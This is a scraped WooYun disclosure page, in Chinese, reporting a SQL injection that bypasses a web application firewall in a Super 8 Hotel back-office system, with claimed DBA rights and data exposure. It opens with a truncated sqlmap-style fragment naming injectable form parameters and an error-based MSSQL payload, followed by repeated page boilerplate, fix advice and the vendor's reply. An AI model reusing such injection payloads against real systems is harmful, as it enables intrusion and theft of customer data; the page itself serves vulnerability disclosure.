r2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescript
ion=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=20
15-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRigh
t=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTim
e$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastMo
difyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastM
odifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$s
cLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCB

漏洞证明：

如上

修复方案：

修改后台密码
修改权限
防注入

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-08-31 12:11

厂商回复：

此系统还在测试阶段,非常感谢您的提醒.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138076

漏洞标题：速8酒店某后台管理系统存在SQL注入可绕过waf（DBA权限+数十万数据泄漏）

相关厂商：速8酒店

漏洞作者：路人甲

提交时间：2015-08-31 11:15

修复时间：2015-10-15 12:12

公开时间：2015-10-15 12:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138076

漏洞标题：速8酒店某后台管理系统存在SQL注入可绕过waf（DBA权限+数十万数据泄漏）

相关厂商：速8酒店

漏洞作者： 路人甲

提交时间：2015-08-31 11:15

修复时间：2015-10-15 12:12

公开时间：2015-10-15 12:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0138076"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云